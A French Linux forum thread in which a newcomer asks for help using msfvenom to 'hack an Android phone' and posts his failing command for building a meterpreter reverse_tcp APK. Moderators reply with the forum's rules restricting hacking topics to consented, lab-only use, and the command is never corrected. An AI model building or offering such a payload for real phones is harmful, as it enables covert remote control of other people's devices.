user@linuxtrack:~ $ python -c 'print("Soyez les bienvenus !")'

Vous n'êtes pas identifié(e).

#1 23-07-2015 21:37:13

techno
Membre

probleme pour configurer android hacking depuis msfvenom

Bonjour a tous, je suis nouvel utilisateur de linux et par curiousité j'ai decouvert recement
qu'on pouvait hacker un telephone android grace a metasploit.
j'utilise kali 3.18.
j'ai suivi plusieurs tuto sur internet mais quand je lance msfvenom avec cette commande: msfvenom -p android/meterpreter/reverse_tcp LHOST 192.XX.XX.XX LPORT=4444 R > BOOB.apk

ce message apparait ensuite :
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
The following options failed to validate: LHOST

Aider moi svp a bien configurer et a decouvrir cette nouvelle trouvaille.

Merci infiniment d'avance

Hors ligne

#2 23-07-2015 22:53:24

azgarech
Crazy one

Re : probleme pour configurer android hacking depuis msfvenom

Bonjour,

D'une, tu ne t'es pas présenté dans dans la section présentation qui est obligatoire avant de poster quelque soit d'autre.
De deux, tu n'es pas dans la bonne section du forum pour demander de l'aider. Je te laisse chercher un peu.

Si on ne respecte pas ça un minima c'est l'anarchie.
Merci de rectifier le tire.

Sinon je n'ai jamais utilisé cette outil pour de l'android.

Bonne soirée


Security is always excessive until it’s not enough. — Robbie Sinclair

Hors ligne

#3 24-07-2015 00:35:56

techno
Membre

Re : probleme pour configurer android hacking depuis msfvenom

merci pour la reponse et dsl pour la maladresse.
l'espere rectifier ma maladresse

Hors ligne

#4 24-07-2015 07:10:04

IceF0x
#! Gourou Linux

Re : probleme pour configurer android hacking depuis msfvenom

Merci de lires les règles affiché à l'inscription... 1er avertissement avant sanction.

je rappelle les règles dont la partie qui nous occupe.

Règles du forum a écrit :

Philosophie du forum

Le forum est un forum ayant trait au logiciels libres, ce n'est en aucun cas un forum de haking ou de sécurité informatique.
Toutefois, dans certaines condition il se peut que les topics et questions ayant trait au hacking soit autorisé ici si et seulement si le projet, le produit en devenir, la demande tout simplement, ... etc :

* se fasse dans un but de créativité ou de test en laboratoire.
* se fasse avec l'accord de la personne si une tierce personne est impliquée. (pour les questions de remote-desktop).
* ne serve pas à nuire à autrui dans son objectif premier. Après si le projet est forké vers quelque chose de plus nuisible, ce n'est plus de la responsabilité du gars qui ne développait pas son projet dans ce but là.
* qu'il respecte les licences dont la GNU GPLv2 et 3. Droit au partage, droit à la modification et l'accès au sources. Notre forum étant un forum avant tout pour les logiciels libres.


Utiliser des logiciels propriétaires, c'est comme les plats préparés, on est incapable de dire les conservateurs qu'ils contiennent, on dira toujours que c'est bon, mais ça ne remplacera jamais le repas fait maison par sa maman.
]:D #! Crunchbang & Archlinux GNU/Linux User ]:D

Hors ligne

Pied de page des forums